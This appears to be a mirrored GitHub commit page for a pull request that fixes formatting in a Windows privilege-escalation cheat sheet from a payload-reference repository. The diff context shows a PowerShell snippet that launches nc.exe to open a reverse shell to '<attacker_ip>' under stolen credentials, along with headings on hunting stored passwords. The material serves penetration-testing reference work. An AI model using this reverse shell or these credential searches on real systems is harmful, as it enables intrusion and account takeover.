mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Merge pull request #166 from fanixk/patch-1
Update Windows - Privilege Escalation.md
This commit is contained in:
commit
6c38274bdb
@ -12,7 +12,7 @@
|
||||
* [Search for file contents](#search-for-file-contents)
|
||||
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
||||
* [Passwords in unattend.xml](#passwords-in-unattend.xml)
|
||||
* [Passwords in unattend.xml](#passwords-in-unattendxml)
|
||||
* [Wifi passwords](#wifi-passwords)
|
||||
* [Passwords stored in services](#passwords-stored-in-services)
|
||||
* [Powershell history](#powershell-history)
|
||||
@ -712,9 +712,9 @@ C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\us
|
||||
```
|
||||
|
||||
```powershell
|
||||
$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
||||
$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
||||
$ computer = "<hostname>"
|
||||
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
||||
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
||||
$computer = "<hostname>"
|
||||
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
|
||||
```
|
||||
|
||||
@ -979,4 +979,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
||||
* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
|
||||
* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
|
||||
* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
|
||||
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
|
||||
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
|
||||
|
Loading…
Reference in New Issue
Block a user